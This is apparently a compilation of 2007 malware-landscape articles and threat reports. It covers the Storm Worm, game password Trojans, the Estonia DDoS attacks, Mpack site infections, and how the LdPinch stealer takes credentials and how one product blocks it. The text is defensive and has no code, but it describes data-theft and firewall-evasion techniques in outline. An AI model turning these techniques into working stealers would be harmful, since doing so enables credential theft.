Antivirus solutions were initially designed as individual utilities to detect and remove specific viruses. However, as the number of viruses increased, antivirus 'toolkits' were released. These included an on-demand scanner which would search for the viruses currently in existence, and in some cases a cleaning utility. By the end of 1990, an increase in the number of viruses to nearly 300 caused antivirus vendors to implement real-time protection, and to supplement signature based analysis with heuristics, behavioural analysis, emulation and other techniques.
The appearance of the first macro virus in 1995 was a major shift, and these viruses came to dominate the threat landscape in the following four years. Such viruses were the first to deliberately infect data files; they are also neither platform-specific nor OS-specific. This move shifted the focus of the virus writing community from executable code to data. Virus macros were easy to modify, and this opened virus writing to a wider group, causing the number of viruses to increase from around 6,000 in June 1995 to more than 25,000 in December 1998.
With both the threat landscape and business practices evolving, antivirus solutions also needed to change. It became clear that gateway and mail server solutions would be required in addition to file server and workstation solutions in order to fully secure networks.
The appearance of the Melissa virus, in March 1999, was another leap forward for malicious code. Melissa's ability to spread independently ushered in the era of email worms, which spread in a variety of ways, and typically use social engineering to trick the user into running the malicious code. Internet worms, which often spread by exploiting vulnerabilities (and often combine this approach with other techniques for maximum effectiveness) made a return in 2001, and remained prevalent in the following years.
In response to these new threats, antivirus vendors started to offer solutions which were broader in scope: adding personal firewall capability, host- and network-based intrusion protection systems, application activity monitoring, and, in some cases, roll-back capability which will undo changes that malicious programs have made to a victim machine.
The decline in global epidemics since 2003 reflects a shift in the motivation of virus writers: from writing and spreading malicious code in order simply to cause damage to doing this in order to earn money illegally. This has resulted in tailor-made Trojans designed to target a specific system and malicious programs designed to steal user data such as account details and passwords to bank accounts and online games. Trojans can be used to create botnets of infected machines which are then used to send spam which may also contain malicious code. Phishing attacks have also become widespread, with cybercriminals tricking users into entering their bank account details on fake sites.
Against this background, virus writers have also started targeting the mobile devices which are increasingly used in the business world. Since the first worm for smartphones was detected in 2004, viruses, worms and Trojans for mobile devices have also put in an appearance. In the space of a few years, threats for mobile devices have evolved as much as PC malware did over the course of 20 years.
The author concludes by emphasising that the threat landscape has changed beyond recognition, making it more important that ever for users to have effective protection. Security solutions must deliver timely protection against the approximately 200 new threats which appear daily, while also implementing technologies which can block unknown threats as they appear.
Non profit malware Organizations
2007 will be remembered as the year of the demise of “non-profit” malicious programs. For the first time, the year saw no large epidemics or major malicious programs that didn’t have a “financial” background. Almost all the outbreaks in 2007 were short-lived and affected individual regions and countries rather than the entire global Internet. This approach to organizing epidemics has already become a de facto standard in the malware world.
Among the year’s new malicious programs, a special place is occupied by the Storm Worm (Zhelatin in the Kaspersky Lab classification), which first appeared in January 2007. It demonstrated such a variety of behavior types and spreading methods during the year that each new creation from the unknown virus writers gave antivirus experts yet another headache.
Worms in the Zhelatin family incorporate implementations of nearly all the virus writing achievements of the past several years, including rootkit technologies, code obfuscation, botnets that protect themselves against analysis, and communication between infected computers via P2P networks, without a control center. Zhelatin worms make use of all the existing spreading methods, both traditional (email and instant messaging systems) and new, such as Web 2.0 services (spreading via social networks, including blogs, forums and RSS feeds).
DoS attacks were among the key information security threats throughout 2007. Following their extensive use in 2002-2003, DoS attacks lost popularity among cybercriminals. In 2007, they made a comeback, this time as a political and competitive tool rather than a method of extorting money from victims. An attack on Estonia which took place in May 2007 was extensively covered by mass media and is regarded as the first instance of cyber-warfare by many experts. Many DoS attacks of 2007 were instigated by the victims’ business competitors. Whereas four years ago, DoS attacks were used by hackers to extort money or by cybervandals to wreak havoc, such attacks are now a commodity to the same extent as spam mailings and custom-developed malicious programs.
In 2007, the cybercriminal business came up with several new types of criminal activity. One area that progressed rapidly was the development of malicious programs to order with technical support provided to customers. A good example of business organized along these lines is Pinch, a Trojan program. Its authors developed more than 4,000 custom variants in several years. The Pinch story apparently ended in December 2007, when Nikolay Patrushev, head of Russia’s Federal Security Services, announced that the Trojan’s authors had been arrested.
Looking at the year’s results from the quantitative point of view, a hands-down victory was won by game Trojans, which are designed to steal data from online game users. These malicious programs significantly outnumber banking Trojans, i.e., programs that steal users’ bank account data.
Notable events of 2007 include mass site hacking attacks, after which malicious programs or links to infected sites were placed on the hacked websites. In one such event, about 10,000 Italian sites were hacked and the Mpack exploit pack was put onto the hacked sites. The Italian incident and Mpack drew attention to one more area of cybercriminal activity: the malicious programs were traced to Russian Business Network (RBN) websites. In fact, this is an example of so-called bulletproof hosting. The service guarantees customers anonymity, protection from legal action and the absence of log files. There was a boom of mass media coverage of RBN, which ended when RBN broke up into several hosting services in different countries, making the scale of their activities less obvious.
These were the principal events of 2007, a year that turned out to be the most “viral” year in history. The total number of IT threats more than doubled during the year. In 2007, Kaspersky Lab added almost as many signatures to its databases as it had during the preceding 15 years. Internet users had never been exposed to such a deluge of threats before, and we had to make every conceivable (and, sometimes, inconceivable) effort to get the better of these threats. This raises serious concerns, because, unless the situation radically changes in 2008 (which is highly unlikely), the number of threats will double again by the end of the year.
Forecasts
1. Malware 2.0
The evolution of malware from individual malicious programs towards sophisticated integrated projects began four years ago with a modular component system used in the Bagle worm. The new malicious program operating model, the effectiveness of which was demonstrated in 2007 by the Storm Worm, will not only become a standard on which a host of new malicious projects will be based, but will also be further developed and perfected.
The model has the following main features:
A network of infected computers is not centrally controlled.
The malware actively resists third-party attempts to analyze its malicious activity and take control of it.
Malicious code is distributed to a large number of computers, but this distribution is performed over a limited period of time.
Social engineering methods are skillfully used.
Different methods are used for malware distribution, with the most obvious methods (such as email) gradually losing popularity.
Different functions are performed by different modules (instead of the all-in-one design).
The new generation of malicious programs can be regarded as Malware 2.0. These techniques are used by such malicious programs as Bagle, Zhelatin and Warezov, which are mostly spam-oriented. At the same time, several banking and game Trojan families are also showing signs of evolving towards the Malware 2.0 paradigm.
2. Rootkits and “bootkits”
Technologies that mask the presence of malicious programs in the system (rootkits) will be used not only by Trojans, but by file viruses as well. One dangerous method of masking the presence of malware in the system is based on infecting the hard drive’s boot sector (programs that do this are called bootkits). This is a reincarnation of an old technique, which allows a malicious program to take control before the operating system (and antivirus software) fully boots. In 2007, this method was used by Backdoor.Win32.Sinowal. This is a significant threat, which could become one of the most dangerous information security threats of 2008.
3. File viruses
File viruses will continue their comeback. As before, they will be developed primarily by Chinese cybercriminals and will target users of online games. The authors of Zhelatin or Warezov might well use file infection as well, since this can provide them with one more efficient distribution method.
In 2008, we can expect a surge in the number of incidents involving infected game and program distribution packages available from popular websites or via P2P networks. Viruses will target those files which users provide to other users, since in many cases this method of spreading is even more effective than sending infected files by email.
4. Attacks targeting social networks
In 2008, phishing will increasingly target users of social networks. User account data for such services as Facebook, MySpaces, Livejournal, Blogger etc. will be in demand among cybercriminals. This will become an important alternative to distribution methods based on putting malicious programs onto hacked websites. In 2008, many Trojans will be distributed through accounts of social network users, via their weblogs and profiles.
XSS / PHP / SQL attacks will be one more problem associated with social networks. Unlike phishing, which is based on fraud and social engineering methods only, these attacks take advantage of errors and vulnerabilities in Web 2.0 services. Consequently, even the most experienced users can be affected. These attacks, like all the others, will target users’ private data and will be used to create databases and/or lists to conduct further attacks involving “traditional” methods.
5. Mobile threats
As regards mobile devices and, specifically, mobile phones, threats will include primitive Trojans such as the Skuller family for Symbian and the “first Trojan” for the iPhone, as well as various vulnerabilities in smartphone operating systems and applications. A global epidemic of a mobile worm is still unlikely, though, from a technical point of view, it is possible. In 2007, the consolidation of the mobile operating system market between Symbian and Windows Mobile was disrupted somewhat by the launch of the iPhone and the announcement by Google of Android, its new mobile platform. As a result of the iPhone’s popularity and newcomer status, it is likely to attract more attention from cybercriminals than other mobile devices, especially if Apple makes its iPhone software development tools (SDK) available to the public, as they promised in late 2007.
MalCode Evolution
Although the title seems to reference the full spectrum of technologies used to detect malicious code, the article focuses on nonsignature technologies.
At the beginning of the article the author points out that any technology used to detect malicious code has two components – a technical component and an analytical component. The technical component is the sum of all functions and algorithms which provide the analytical component with data for analysis. The analytical component is a decision making system which delivers a verdict on the data analysed.
The technical component. The technical component of a malware detection system collects data that will be used to analyze the situation.
As any malicious program is both a file with specific content and the sum of the effects the malicious program has on the operating system, there are a range of methods used to collect data in order to identify malicious code. These methods are listed in order of abstraction. The term abstraction is used to denote the point of view from which the program being run is viewed: as an original digital object (a collection of bytes), as a behaviour (more abstract than the collection of bytes) or as the sum of effects on the operating system (more abstract than the behaviour). Antivirus technology has, more or less, evolved along these lines: working with files, working with events via a file, working with a file via events, and working with the environment itself. Consequently, the list given in the article illustrates a natural chronology.
The very first antivirus programs analyzed file code which was treated as byte sequences.
Using this method means that only the source byte code of a program is analyzed; program behaviour is not taken into account. Today, this method continues to be used in antivirus software - not as the sole detection method, but as a complement to other technologies.
Emulating program code.
Emulation involves imitating the work of one system using another system without losing functionality and without distorting results. In relation to antivirus software, the emulator breaks down a program's byte code into commands, and then launches each commend in a virtual copy of the computer environment. In other words, while an emulator works with a file, it does analyze events. Emulation makes it possible to observe a program’s behaviour without putting the operating system and user data at risk.
Virtualization: launching a program in a sandbox.
A sandbox is an environment which uses partial or total restrictions or emulation of the resources of the operating system to ensure that a program can be safely launched in the space. In this case, virtualization makes it possible to work works with a program that is running in a real environment but the environment is strictly controlled. Using the metaphor of a child in the playground, the operating system represents the world, the malicious program is the child, and the constraints within which the child plays are the confines of the sandbox: a set of rules for interaction between the program and the operating system. Any point of contact between the program and its environment (such as the file system and system registry) can be virtualized. Whereas emulation provides an environment in which programs can be run, virtualization uses the operating system itself as the environment, with the sandbox controlling the interaction between the environment and the program.
Monitoring system events.
Whereas an emulator or sandbox observes each program separately; monitoring technology observes all programs simultaneously by registering all operating system events created by running programs. This technology is currently the most rapidly evolving. However, it is not the most fail-safe technology, as the risk created when launching a program in a real environment significantly lowers the level of protection. Additionally, the monitoring technology can be deceived by the malicious program.
Searching for system anomalies.
This method makes use of the following features:
an operating system, together with the programs running within that system, is an integrated system;
the operating system has an intrinsic “system status”;
if malicious code is run in the environment, then the system will have an “unhealthy" status; this differs from a system with a "healthy" status, in which there is no malicious code.
In order to detect malicious code effectively using this method, a relatively complex analytical system (such as an expert system or neural network) is required. Due to this complexity, the technology is still currently underdeveloped. At the moment, implementations in this area generally compare the condition of the system with a known standard, but this is not effective.
The analytical component. As for the analytical component, the sophistication of decision-making algorithms varies. Roughly speaking, they can be divided into three categories:
Simple comparison.
In this category, a verdict is issued based on the comparison of a single object with an available sample.
Complex comparison.
In this case a verdict is issued based on the comparison of one or several objects with corresponding samples. The templates used for comparison may be flexible, and the comparison gives a probability based result.
Expert systems.
In this category, a verdict is issued after a sophisticated analysis of data. An expert system may include elements of artificial intelligence.
The article then goes on to examines exactly which algorithms are used in which malware detection technologies. The technical component of a technology is responsible for features such as how resource-hungry a program is (and as a result, how quickly it works), security and protection. In general, the less abstract the form of protection, the more secure it will be, but the easier it will be to circumvent.
The analytical aspect of a technology is responsible for features such as proactivity (and the consequent impact on the necessity for frequent antivirus database updates), the false positive rate and the level of user involvement. This last denotes the extent to which a user needs to participate in defining protection policies: creating rules, exceptions and black and white lists. It also reflects the extent to which the user participates in the process of issuing verdicts by confirming or rejecting the suspicions of the analytical system. The more complex the analytical system, the more powerful the protection is. However, increased complexity means an increased number of false positives, which can be compensated for by greater user input.
The author concludes by offering recommendations on how to choose non-signature protection. She stresses that there is no universal or ‘best’ protection; each technology has its pluses and minuses. In choosing a product, the user should be guided by the results of independent tests, and reviews by users of established antivirus solutions.
Online gaming and Virus Arena
The article explains why online games have become so popular in recent years: they involve exploring magnificent virtual worlds and completing tasks - known as quests - which gain the players money, valuables and experience, not points as in a more traditional computer game. They can be purchased at stores or downloaded from the Internet, but in order to play there is usually a monthly subscription fee. The money from these monthly fees covers traffic costs, support for game servers and game development. New online games appear every year, and the number of players is constantly increasing.
Online games are played on both legitimate and rogue game servers, which appear in approximately equal numbers. Rogue servers are very popular among users such as students and adolescents who have very little money – why waste money on subscription fees if it's possible to play the same game for free on a rogue server? However, the author stresses that rogue servers are often set up with the aim of making money not from subscription fees, but from the sale of virtual items to players in exchange for real money. Such sales may also be conducted by the administrators of official servers, depending on the server policy.
The author does pose an interesting question – if server administrators are selling in-game items, is it legitimate for the players themselves to sell such items? The answer is yes, and this is often done in defiance of administrative rules. Certain sites on the Internet contain detailed information on the price of various in-game items, although the deals often are, more often than not, illegal.
Any in-game item can have a price in real money, which depends on demand. If there is a demand for certain in-game items or confidential data, they will be stolen. With particular knowledge, it is relatively easy to conduct such thefts – most game servers use passwords for authentication. Ñyber criminal activity is often blocked by the administrators of official game servers. However, criminal or dubious activity is unlikely to be investigated by the administrators of rogue servers, and victims cannot rely on the support of the administrators.
Online gamers are constantly targeted by cyber criminals, who use several methods in order to steal confidential data:
Social engineering.
One method used by cyber criminals is to enter a game or a forum on a game server and offer a bonus, or help in the game, in exchange for other players’ passwords. Naïve players looking for ways to make their life easier will often be tempted by such offers.
Another well-known social engineering method is phishing, where the cyber criminal sends phishing emails, purportedly from the server administrators, which invite the player to authenticate his/ her account via a website linked in the message.
Although such password harvesting techniques are simple and reasonably effective, they don't result in much profit for malicious users, as more advanced, “wealthy” players don’t take the bait.
Exploiting game server vulnerabilities.
Just like any other software, game server code contains programming errors and bugs. Such potential vulnerabilities can be exploited by cyber criminals to gain access to server databases and harvest player passwords or password hashes (encrypted passwords that can be decrypted using dedicated programs). For instance, there is a known vulnerability linked to in-game player chat which arises if the chat environment is not isolated from the game database. This makes it possible for a malicious user to harvest passwords directly from in-game chat.
The author highlights the fact that malicious users can exploit the system designed to remind users of forgotten passwords. The article also stresses that the number and type of vulnerabilities are directly linked to serve status - creating patches for rogue servers (if the administrators bother to do this) takes longer than patching vulnerabilities on official servers.
Exploiting game server vulnerabilities does require a certain amount of technical skill, which is why this method is not widely used.
Using malware.
This topic is covered extensively in the article. Malicious programs designed to steal passwords are spread using all means possible. Both malicious programs specifically tailored to steal any passwords and malicious programs which only target online game passwords may be used.
Programs classified by Kaspersky Lab as Trojan-PSW and Trojan-Spy (which intercept data entered via the keyboard and then transmit it to a remote malicious user) and variants of the Trojan.Win32.Qhost family (which modifies the hosts file containing the mapping of network addresses to domain names) are used to harvest passwords. Trojan-Spy.Win32.Delf has similar functionality, but configures a fake proxy server within the browser which is used when connecting to online game servers.
Using malicious programs to harvest passwords has proved effective and simple, and consequently very popular.
The article also covers the evolution of malicious programs which harvest passwords. The first recorded use of a malicious program to steal user passwords to online games was in 1997. Cyber criminals initially used classic keyloggers. The first Trojan specifically designed to target online games was Trojan-PSW.Win32.Lmir.a, which harvests passwords to "Legend of Mir". This program was the forerunner of a generation of Trojans targeting a wide range of online games.
Trojan-PSW.Win32.OnLineGames.a was another significant development, as this Trojan targets nearly all popular online games. Each new variant includes new games to be targeted.
A modern Trojan designed to steal passwords for online games is typically be a dynamic library written in Delphi that automatically connects to all applications launched in the system. When it detects that an online game has been launched, this kind of malicious program intercepts the password entered via the keyboard, sends the data to the malicious user's email and then deletes itself.
In addition to using Trojans to steal passwords, worms are also widely used. Their advantage is that they are able to infect executable files and to copy themselves to removable and network disks, as well as spreading via email.
Currently, the most recent achievement by those writing viruses for online games is the polymorphic Virus.Win32.Alman.a and its successor, Virus.Win32.Hala.a. In addition to the ability to infect executable files, these programs are able to spread via network resources, mask their present in the system, and contain a backdoor function.
The authors of malicious code also attempt to protect their programs against antivirus solutions by using packers, anti-antivirus technologies, and rootkit technologies, which mask the presence of the malicious program in the system. Recent malicious programs which target online games include all three types of self-defense mechanism.
The article also examines how attacks are conducted using a worm in order to harvest online gaming passwords. Malicious users create a worm with multiple functions: an email worm, network worm, p2p worm, rootkit, executable file infector and password stealing functionality all in one package. The worm will then be mass mailed, and an incautious user who clicks on a link in a malicious message can find himself in an unenviable position.
The author covers password theft in terms of geographical location, stating that over 90% of all Trojans targeting online games are written in China, and 90% of the passwords stolen by these Trojans belong to players on South Korean sites. Computerization and the rapid growth of IT in Russia have naturally also had an impact on the evolution of computer entertainment – online games which do not have a separate client, but which are played within the browser have become extremely popular. This popularity has led to an increase in phishing attacks in which messages containing links to cloned gaming sites are spread. The article also includes statistics demonstrating the increase in the number of malicious programs, and the extent to which individual games are targeted by cyber criminals.
The author concludes that those making a living from other people's virtual property are almost immune from a legal point of view. It is the game developers themselves who should tackle this issue, in conjunction with antivirus companies. In 2004, an agreement between Kaspersky Lab and the developers of the Russian online game Fight Club made it possible to prevent the theft of thousands of passwords and the sale of in-game items which would have been worth a five figure sum in 'real' US dollars.
The article concludes by expressing the opinion that those who are being targeted (i.e. the gamers) should take matters into their own hands by using common sense, exercising caution and installing the best security solution available.
MalwareVolution>
The events in Estonia in late April and early May will likely remain the most discussed events in 2007. Dozens of servers on the Estonian Internet were targeted by DDoS attacks after the Estonian police broke up a demonstration in Tallinn, where protestors spoke out against the Estonian government's decision to remove a monument from one of the city's central squares. (The monument commemorated Soviet soldiers who fell while liberating Estonia during WWII.) The websites of the president, the prime minister, the parliament, the police and a number of ministries were overloaded with an enormous number of requests from thousands of computers located around the world. In addition to the DoS attacks, which were primarily targeted at government websites, dozens of other Estonian websites were defaced.
Estonian politicians blamed the Russian special services for the attacks. This was the first time that the word "cyberwar" was used by such highly placed officials. Estonia asked NATO to view the cyber attacks as military action and ultimately requested military protection from threats stemming from the Internet.
What happened on the Russian Internet during this period? As soon as skirmishes between protesters and the police began in Estonia, many Russian Internet users took the only opportunity they had to voice their protest against the actions of the Estonian government - an online protest. This took the form of DoS attacks. A number of different programs began to appear on forums and websites, and they were used to send innumerable requests to Estonian websites. Any person could download this kind of program and launch it on their own computer. In technical terms, this creates a botnet. However, this botnet was constructed with the consent of computer owners who knew what they were doing. Of course, some of these attacks were sent from “real” botnets from previously infected machines, but one should not underestimate the power of this 'manual' attack. If such events can be called a cyberwar, then in this case the war involved guerilla combat.
There was no substantial evidence for the participation of Russian government bodies in these attacks. However, now the problems of cyberwar and cyber terrorism are being discussed round the world, and not just by security professionals, but also by politicians and military experts. Cyber terrorism is clearly not being discussed in ways appropriate to the current situation: too much dangerous information is being published, and readers are offered ready-made cyber terrorist scenarios. Kaspersky Lab has always held the opinion that the publication and discussion of different ways to bring down a target cannot be described as anything but reprehensible. There is no doubt that any such information could provoke certain extremist groups to attempt to spark off a similar scenario. And now Pandora’s box has been opened.
The biggest global event in the cell phone industry in the second quarter of 2007 - or probably the entire year - was the release of Apple's new iPhone. It's predicted that sales over the first 18 months to reach 13.5 million units. Will the iPhone’s popularity act as a tipping point, upsetting the stagnant status quo in the world of mobile viruses? According to our estimates, we can conclude that the year 2008 is when we can expect to see virus problems for the iPhone become a reality. Malicious programs for the iPhone probably won't be worms. Instead, they will probably be typical file viruses and a variety of Trojans. But the biggest threat for iPhone users will be the different vulnerabilities that could be used by malicious users to access information stored on the phone.
Mpack. The authors of malicious programs have begun giving preference to using various vulnerabilities in order to penetrate systems. In mid-June this year, over six thousand Italian servers were detected with websites that included a few strings of malicious html, similar to:
This is a typical construction used to exploit a range of browser vulnerabilities and Kaspersky Lab analysts have been very familiar with it for a number of years now. What happens, and how? There is a certain bundle of exploits that take advantage of the vulnerabilities in popular web browsers and operating systems. Malicious users post these exploits on their own website. In order to attract users to visit the site, they gain access to other websites, usually by using account access information that was previously stolen by a Trojan. Then, the iframe tag is added to all of these sites. The tag leads back to the infected site with the exploits. In the end, a Trojan Downloader is usually installed on the system under attack, which makes it possible to download more viruses, worms, backdoors, spyware, etc to the victim machine.
We were surprised that Mpack made it beyond the borders of Russia and was used in Italy. Here’s why: Mpack was created in Russia and was sold by Russian hackers to other Russian hackers. Its authors are very active when it came to creating and supporting the spread of the Trojan LdPinch. There are several other similar exploit bundles on the black market: Q406 Roll-up package, MDAC, WebAttacker, etc. All of these analogues have better 'success' rates when it comes to infecting systems than does Mpack.
We believe that the biggest problem is that it is extremely difficult to hold the authors of Mpack criminally responsible. They simply take exploits which were identified by other people and then published on IT security websites in the interests of improving security, but they take no responsibility for how these exploit bundles will be used. This is where we come to the age-old question: does disclosing information about vulnerabilities do more harm than good? We promise to return to this issue and voice our views on what’s going on today in terms of blackhat vs. whitehat.
In mid May we detected three variants of a new Trojan for cell phones: Trojan-SMS.SymbOS.Viver. This Trojan sends text messages to premium numbers. As a result, the subscriber who falls victim is charged a certain amount of money which is then transferred to the malicious user's account. In May we registered three such incidents, which just goes to show once again that today’s mobile technologies are continuing to attract the interest of cyber criminals. Unfortunately, we do not have statistics for most other countries, but it’s difficult to believe that this is an exclusively Russian problem.
The key events of the second quarter discussed in this report are certainly food for thought, but they still do not answer the question: what is the next step for viruses and information threats? Despite the emergence of new operating systems (such as Windows Vista), new services (mobile content) and devices (the iPhone), cyber criminals continue to lack initiative and are using tried and tested ways of attacking Internet users. Furthermore, we are seeing a significant return to “the sources”: computers are increasingly the targets of DDoS attacks and attacks that use browser vulnerabilities to penetrate the system. Probably the only thing that distinguishes the present from three years ago is the fact that email is not being used as the primary vehicle for spreading viruses. Instead, instant messaging services are one of today’s key means of distribution. Another difference is that there has been an explosive increase in Trojans targeting the users of online games. The threats are not becoming “smarter.” Innovation has stagnated as development is now focused on cosmetic changes, and we still don't know what may ultimately serve as a catalyst for global changes to the virus landscape in the near future.
Antivirus companies have considerably improved their technologies and introduced several new technologies. Presently, antivirus company clients are protected much more effectively than two years ago. The average time that most new malicious programs survive in the wild has been cut down to a number of hours, and is rarely ever counted in days anymore.
But let’s predict what will happen next. Malicious users will attempt to reach beyond the protection antivirus solutions - a task that is a shift from “getting around” antivirus programs and implies more action in fields that have not yet been mastered by quality antivirus protection, or areas in which protection is not an option for any number of reasons. This is more than likely where the new front will be in the information war: online games, blogs, instant messaging and file swapping networks.
Saving your private RYAN against A smart Virus>
Classifying methods used to steal data
The United States Federal Trade Commission (FTC) views the issue of the theft of confidential data in the broadest sense. Their website provides information about many traditional "non-computerized" means of stealing information, such as stealing wallets and purses, searching through shredded papers that have been thrown in the garbage, making calls allegedly from a financial institution, and using special devices to scan credit card numbers, to name a few.
However, in addition to all these techniques, there are other ways of stealing information. There are at least three different ways to steal data using a computer. The first is when the computer user voluntarily gives information to a malicious user, having trusted a false request for said information. These requests usually come in the form of mass mailings. The malicious user will have created a false website that imitates the site of an actual bank or other financial organization. This kind of computer crime is called phishing.
The second way to steal confidential information involves tracking and logging a user's actions. This kind of electronic espionage is carried out using Trojans which Kaspersky Lab classifies as Trojan-Spy programs. One of the most popular kinds of Trojan-Spy program is the keylogger, covered in detail in a previous article.
The third technique for stealing confidential data involves the use of malicious programs (most often Trojans) to search for confidential information on a user’s computer and then transmit this data to a malicious user. In this case, a malicious user may only receive data that the user considered important enough to enter into the computer’s memory. However, this seeming drawback is compensated for by the fact that the data is transmitted without user participation. For more details about this technique, see: http://www.viruslist.com/en/virusesdescribed?chapter=152540521.
These malicious programs can spread in a number of ways: they can be activated when an email attachment is opened or when a user clicks on a link sent via instant messaging. They can also launch when a file is opened from a directory on a peer-to-peer network or by using scripts on a website that take advantage of idiosyncrasies in web browsers, making it possible for these programs to launch automatically when users visit these sites. Such programs can also be spread via other previously installed malicious programs that are capable of downloading and installing them to the system.
Malicious programs like PSW Trojans are designed to access a range of information about the system, the user and passwords to a number of programs and operating system services. In order to do this, they scan all storage areas which contain relevant data: Windows protected storage, registry keys and certain program files of interest to a malicious user (usually instant messaging clients, email systems and Internet browsers).
After gathering data, the Trojan will usually encrypt it and compress it into a small binary file. Later, the file may be sent via email or placed on the malicious user's FTP server.
The way in which the abovementioned malicious programs function is covered in detail in "Computers, Networks and Theft", which examines two different techniques used by modern security solutions to protect confidential data
How do today's products protect confidential data?
Almost all modern security solutions (such as Security Suite) include a component which protects confidential data, typically called Privacy Control. (In some applications, this component is combined with other security components, such as an anti-phishing component.) The key purpose of this component is to protect confidential information on the user's computer against unauthorized access and transmission.
Let’s take a look at how Symantec products implement protection for confidential data. This company was chosen because they were one of the first to implement protection for confidential data in their products, before other market players followed suit and added their own, similar components.
Back in late 1999, Symantec published information about their new product, Norton Internet Security 2000. This featured the new Norton Privacy Control, with one of its key modules being Confidential Data Blocking.
This component works in the following way:
the user must enter all data he considers confidential,
the product will then analyze all outgoing traffic from the user’s computer and either "cut up" all outgoing confidential data, or substitute it with meaningless symbols (such as “*”).
Figure 1. Norton Internet Security 2000 Confidential Data component
Norton’s Privacy Control component is included in new Norton products, such as Norton Personal Firewall and Norton Internet Security.
The company’s latest flagship product is Norton360, which was released by Symantec in 2007. The Privacy Control component is also included in Norton360, but not in the regular package. Instead, it comes as an Add-on Pack which can be downloaded from Symantec's official website.
Figure 2. Norton360 Confidential Data Blocking component
The main idea behind the product remains unchanged: just as Norton Internet Security 2000, it uses a table into which the user is meant to enter his confidential data (see figure 2).
Drawbacks in traditional approaches to protecting confidential data
What made the program’s developers decide to remove the Confidential Data protection component from the list of standard Norton360 modules? There are probably several reasons, but one stands out in particular. The truth is that this approach to protecting confidential information is not effective ─ it only creates the illusion of security.
Some official descriptions of the latest version of Norton Internet Security say that it "blocks […] transmitting unauthorized information''. However, this is not actually the case.
If you look carefully at the first window in Figure 2, you can see a note in the lower half of the window: Norton Add-on Pack cannot block confidential information on secure Web sites. However, secure Web sites already ensure your data is safe.” The reason for this note is simple: data exchange with secure websites uses data encryption, which makes it impossible for any third party to analyze the data transmitted.
A confidential data protection component should protect users from Trojans like PSW Trojans. What prevents a Trojan from encrypting all data being transmitted? Nothing, actually, and over 80% of Trojans do just that. That is why the confidential data protection component - which is based on traffic analysis and searching for previously entered data sequences - is not capable of preventing data from being sent out in most cases, since it simply will not find the data once it has been encrypted by a Trojan.
Furthermore, storing all your confidential information in one place after entering the data in windows like the ones in Figure 2 cannot do anything to increase security. On the contrary, instead of having to search through all kinds of data in several places on a computer's file system, a malicious user knows right where to go and all he has to do is gain access to the file used by the protection component. There is no doubt that developers do everything they can to secure the data entered by the user, but security cannot be guaranteed.
An example of how this component works is as follows: if a webpage asks you to enter your telephone number, Norton Internet Security 2000 will ask you if you are sure that you want to send this confidential data after you have entered it into the text field. However, that warning is not especially helpful in real life, since the user decision to enter the requested information is based on whether or not s/he trusts the website. If the user believes the website is authentic, then the program warning will not stop the user from entering data. If the user believes the website is fraudulent, then he will not bother to enter any data in the first place.
Unfortunately, today there are more and more fraudulent websites designed by malicious users to look very similar to the official websites of financial institutions, and users willingly enter their confidential data despite security solution warnings.
An alternative approach to protecting confidential data
There is another approach to protecting confidential data based on blocking the actions of malicious programs at earlier stages, before data is transmitted, and before it is too late.
In order to steal confidential information, a malicious program must take two actions: find the information and extract it from wherever it is being stored (that could be a file, a registry key, or an operating system's special storage area) and transmit it to the author of the malicious program via specific channels. Since many computers already have firewalls installed which control the network activity of applications on the computer, the malicious program cannot transmit any collected data under its own name. That is why many PSW Trojans use different tactics to evade firewall protection, making them able to send data without the user's knowledge.
It should then follow that the protection component should track the activity of applications when that activity is indicative of a potential attempt to steal confidential information:
An attempt to gain access to personal data or passwords located in Microsoft Windows’ Protected Storage.
This service is used to store confidential data, such as local passwords, passwords for POP and SMTP email servers, Internet access passwords, passwords for automatic access to closed website sections, other Internet data and passwords for automatically filling out Internet forms, and other information. These data are entered into the relevant text field of email clients and web browsers. As a rule, the user may store the entered data; in order to do so, he needs to mark it with a special flag. In this case, the data that is entered is stored in Microsoft Windows Protected Storage.
Even users who are concerned about information leaks and do not save passwords or other data in their Internet browser usually save their email passwords, since entering their password each time they receive or send something is too time consuming. Since many Internet providers use the same password for email and for Internet access, obtaining this password will give a malicious user access to both the email account and the Internet connection settings.
Attempts to stealth data sending.
In order to transmit the data it has collected, a malicious program will try different tactics to get around a firewall if one is installed on the victim computer. For example, it may stealthily launch an Internet browser process and transmit data using program interfaces common to most browsers (COM, OLE, DDE and others). Since most modern firewalls have a set of pre-installed settings that permit network activity for trusted applications, the firewall will not react to the transmission of data by the Internet browser and the user will not be aware of this activity nor will he be able to prevent the data leak.
When using this approach, encryption of stolen data by a malicious program is not a problem, as the malicious program's payload will be blocked before encrypted information can be transmitted.
This approach is implemented in Kaspersky Internet Security 7.0.
Trojan-PSW.Win32.LdPinch: how KIS 7.0 protects against the theft of confidential data
Kaspersky Internet Security 7.0 also features a confidential data protection module that serves as one of the subsystems of its Anti-Spyware component (see Figure 3). It analyzes the behavior of all processes in the user's system and if it detects either of two of types of action described above, it will either warn the user or automatically block the action.
Figure 3. Configuring Kaspersky Internet Security 7.0 Anti-Spyware component
Let’s examine how this KIS module protects users against attempts to steal confidential data using Trojan-PSW.Win32.LdPinch as an example. This Trojan's main goal is to steal passwords from a range of applications installed on a user's computer.
As this virus description shows, Trojan-PSW.Win32.LdPinch is designed to steal information about a computer's hard drive and the amount of free space remaining on it, the current user, the computer's network name, the version of the operating system, the processor type, the monitor specifications, the applications installed on the computer, the current running processes and any existing dial-up connections. Of course, most of the information it steals are passwords for a wide range of programs, including the following:
instant messaging clients:
ICQ 99B-2002a
ICQ 2003/Lite/5/Rambler
Miranda IM
TRILLIAN
&RQ, RnQ, The Rat
QIP
GAIM
MSN & Live Messenger
email clients:
The Bat!
MS Office Outlook
Mail.Ru Agent
Becky
Eudora
Mozilla Thunderbird
Gmail Notifier
Internet browsers:
Opera
Protected Storage(IE,Outlook Express)
Mozilla Browser
Mozilla Firefox
automatic dialers:
RAS
E-DIALER
VDialer
file managers:
FAR
Windows/Total Commander
FTP clients:
CuteFTP
WS FTP
FileZilla
Flash FXP
Smart FTP
Coffee Cup FTP
and many others.
Stolen passwords are used to further spread malicious programs. Once a password for an ICQ client is obtained, for example, the Trojan will modify this password on the ICQ website and begin sending messages with a link to its own executable file from the victim’s account in an attempt to infect as many machines as possible.
All stolen data is encrypted and sent either to a specific email address or placed on the malicious user's FTP server.
